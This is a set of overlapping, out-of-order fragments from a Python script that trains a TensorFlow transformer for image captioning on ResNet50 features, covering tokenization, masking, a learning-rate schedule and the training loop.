len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length", "arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) *", "plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") #", "len(x.split())) # Max length of captions after tokenization # tfds demonstrated in earlier", "# Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0],", "the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1,", "print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for", "tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in", "pad and mask future tokens in the input received by # the decoder.", "load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in", "from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import", "max_len: x = x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens']", "= 4 d_model = 128 dff = d_model * 4 num_heads = 8", "tokenized and padded/truncated\") # now to compute a column with the new name", "cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use", "in the decoder. # It is used to pad and mask future tokens", "train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions #", "block in the decoder. # This padding mask is used to mask the", "enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer)", "= './data/' save_prefix = prefix + \"features/\" # for storing prefixes annot =", "transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU", "{:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {}", "Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we", "This should just be 1's # input shape should be (batch_size, 49, 2048)", "inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5])", "# import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32)))", "= tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch", "Max length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) #", "from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred)", "spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization", "x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x:", "re import os import time import datetime from tqdm import tqdm # our", "gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for", "a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of", "of notebook state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU')", "12 layers, 768 as embedding dim, 12 attention heads # and 4H (4x768)", "len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must be set", "embedding dim, 12 attention heads # and 4H (4x768) as feedforward size #", "the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return", "new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix", "= prefix + \"features/\" # for storing prefixes annot = prefix + 'data.csv'", "vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder. # This", "visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia", "Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 #", "in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y", "np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load", "half validation examples so we dont need to split # img_train, img_val, cap_train,", "= tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *=", "complexity of the model # BERT (base) uses 12 layers, 768 as embedding", "combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path =", "increase depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset", "tensorflow_datasets as tfds import numpy as np import pandas as pd from sklearn.model_selection", "examples so we dont need to split # img_train, img_val, cap_train, cap_val =", "start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for", "vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask #", "enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\")", "tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used", "######################### # Training Setup ######################### # Learning Rate Schedule, as per `Attention is", "at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1,", "dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions,", "print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens = inputs['caption'].map(lambda", "= vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup", "start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see results in", "file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor,", "Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time()", "tensorflow as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image", "in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model #########################", "will set this as the max length of captions # which cover 99%", "Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch,", "or increase depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)", "train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm = time.time()", "pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention", "notebook state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') #", "tfds import numpy as np import pandas as pd from sklearn.model_selection import train_test_split", "top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by", "d_model = 128 dff = d_model * 4 num_heads = 8 # BERT", "\"Logical GPU\") except RuntimeError as e: # Visible devices must be set before", "loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask)", "dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints", "train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states()", "True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except", "(4x768) as feedforward size # Small Model num_layers = 4 d_model = 128", "out if not training on GPU ## ## this is important for running", "# Used in the 2nd attention block in the decoder. # This padding", "logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e:", "print(\"Captions tokenized and padded/truncated\") # now to compute a column with the new", "step of raining on one batch in an epoch @tf.function def train_step(inp, tar):", "used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the", "+ 'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names", "train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp, tar)) in", "# Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor", "on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:,", "= 128 dff = d_model * 4 num_heads = 8 # BERT Base", "12 # d_model = 768 # dff = d_model * 4 # as", "img_names, captions # Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name,", "for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 ==", "checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f}", "2070/NVidia GPU ############### ## Please comment out if not training on GPU ##", "'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize", "self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self,", "transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss,", "dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify", "pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate", "ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint", "= create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True,", "-> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch %", "{} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if", "per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes", "data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set", "tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch", "Max length of captions after tokenization # tfds demonstrated in earlier chapters #", "Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch:", "to pad and mask future tokens in the input received by # the", "CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### #", "the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block", "# the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)", "target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup", "look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask,", "= tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\"", "tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp,", "# num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate", "'<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() +", "image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') #########################", "we dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, #", "######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation", "predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training", "as feedforward size # Small Model num_layers = 4 d_model = 128 dff", "only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow", "49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask", "GPU ############### ## Please comment out if not training on GPU ## ##", "'./data/' save_prefix = prefix + \"features/\" # for storing prefixes annot = prefix", "def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x +", "print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") #", "cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a", "if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint", "print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A", "import tensorflow_datasets as tfds import numpy as np import pandas as pd from", "Model ######################### # These parameters control the size and complexity of the model", "seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus", "for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images,", "x: len(x.split())) # Max length of captions after tokenization # tfds demonstrated in", "max_len = int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end", "dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) #", "loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_)", "on GPU ## ## this is important for running CuDNN on GPU ##", "tf.keras.backend.clear_session() # - for easy reset of notebook state # chck if GPU", "dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### #", "warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps", "print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE", "the 2nd attention block in the decoder. # This padding mask is used", "dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in", "# should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads,", "img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy", "super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def", "= \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if", "as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import", "tokens dropout_rate = 0.1 EPOCHS = 20 # should see results in 4-10", "EPOCHS = 20 # should see results in 4-10 epochs also transformer =", "######################### prefix = './data/' save_prefix = prefix + \"features/\" # for storing prefixes", "by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after", "inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in", "train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving", "be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be", "= 768 # dff = d_model * 4 # as per BERT paper", "img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train,", "'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names =", "import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as", "# 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### #", "with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask)", "split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions", "Model num_layers = 4 d_model = 128 dff = d_model * 4 num_heads", "= 20 # should see results in 4-10 epochs also transformer = vt.Transformer(num_layers,", "decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask,", "len(x) < max_len: x = x + [0] * int(max_len - len(x)) return", "Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask =", "+ 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch", "img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train", "from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import", "from tqdm import tqdm # our visual transformer code import visual_transformer as vt", "random_state=42) img_train, cap_train = img_names, captions # Load the numpy file with extracted", "should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff,", "# Max length of captions after tokenization # tfds demonstrated in earlier chapters", "be set before GPUs have been initialized print(e) ############################################### ######################### # Load Data", "learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule:", "(self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer =", "sklearn.model_selection import train_test_split import json from glob import glob from PIL import Image", "= tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape:", "+ end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if", "+ 1) # for special tokens start = '<s>' end = '</s>' inputs['tokenized']", "the max length of captions # which cover 99% of the captions without", "tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch", "in the 2nd attention block in the decoder. # This padding mask is", "epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 ==", "import time import datetime from tqdm import tqdm # our visual transformer code", "# num_layers = 12 # d_model = 768 # dff = d_model *", "np import pandas as pd from sklearn.model_selection import train_test_split import json from glob", "mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used", "transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm =", "# chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) #", "item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img,", "Encoder padding mask - This should just be 1's # input shape should", "####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if", "It is used to pad and mask future tokens in the input received", "code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ###############", "= dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in an", "captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples", "this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for", "tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt", "+ x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions =", "paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model", "if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {}", "name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar): # Encoder", "as tfds import numpy as np import pandas as pd from sklearn.model_selection import", "tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts =", "= '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some", "comment out if not training on GPU ## ## this is important for", "exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### #", "images ######################### prefix = './data/' save_prefix = prefix + \"features/\" # for storing", "768 # dff = d_model * 4 # as per BERT paper #", "model # BERT (base) uses 12 layers, 768 as embedding dim, 12 attention", ") ######################### # Training Setup ######################### # Learning Rate Schedule, as per `Attention", "tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)", "can reduce or increase depending on GPU capacity # Shuffle and batch dataset", "vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path", "{:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) %", "import tensorflow as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from", "(batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used", "is a quick way if data fits in memory lens = inputs['caption'].map(lambda x:", "transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS):", "our visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX", "## tf.keras.backend.clear_session() # - for easy reset of notebook state # chck if", "e: # Visible devices must be set before GPUs have been initialized print(e)", "to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus =", "######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a", "Small Model num_layers = 4 d_model = 128 dff = d_model * 4", "reduce or increase depending on GPU capacity # Shuffle and batch dataset =", "tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: #", "print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) <", "= dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one", "the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar)", "one batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1]", "storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"])", "768 as embedding dim, 12 attention heads # and 4H (4x768) as feedforward", "took half validation examples so we dont need to split # img_train, img_val,", "# Build Transformer Model ######################### # These parameters control the size and complexity", "includes start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see results", "\", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x =", "tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only", "been initialized print(e) ############################################### ######################### # Load Data file mapping captions to images", "raining on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp =", "wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions", "d_model * 4 num_heads = 8 # BERT Base Model # num_layers =", "# our visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR", "- for easy reset of notebook state # chck if GPU can be", "inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples so we", "Training Setup ######################### # Learning Rate Schedule, as per `Attention is All You", "cap_tokenizer.encode(x) if len(x) < max_len: x = x + [0] * int(max_len -", "% 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {}", "max length of captions # which cover 99% of the captions without truncation", "try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical", "tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap", "print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These", "* 4 num_heads = 8 # BERT Base Model # num_layers = 12", "inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq)", "2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch {} at {}'.format(epoch", "## Please comment out if not training on GPU ## ## this is", "dff = d_model * 4 # as per BERT paper # num_heads =", "parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE)", "per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000):", "item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for", "Schedule, as per `Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self,", "def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5)", "attention block in the decoder. # This padding mask is used to mask", "= img_names, captions # Load the numpy file with extracted ResNet50 feature def", "warmup_steps def __call__(self, step): arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps **", "# Load Data file mapping captions to images ######################### prefix = './data/' save_prefix", "= vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False", "tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss", "for special tokens start = '<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda", "only took half validation examples so we dont need to split # img_train,", "loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(", "4 d_model = 128 dff = d_model * 4 num_heads = 8 #", "in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:, :-1] tar_real =", "time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp,", "= train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions", "as per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already", "tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real,", "RTX 2070/NVidia GPU ############### ## Please comment out if not training on GPU", "## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # -", "size and complexity of the model # BERT (base) uses 12 layers, 768", "4 num_heads = 8 # BERT Base Model # num_layers = 12 #", "tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible", "shape should be (batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels", "# Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one", 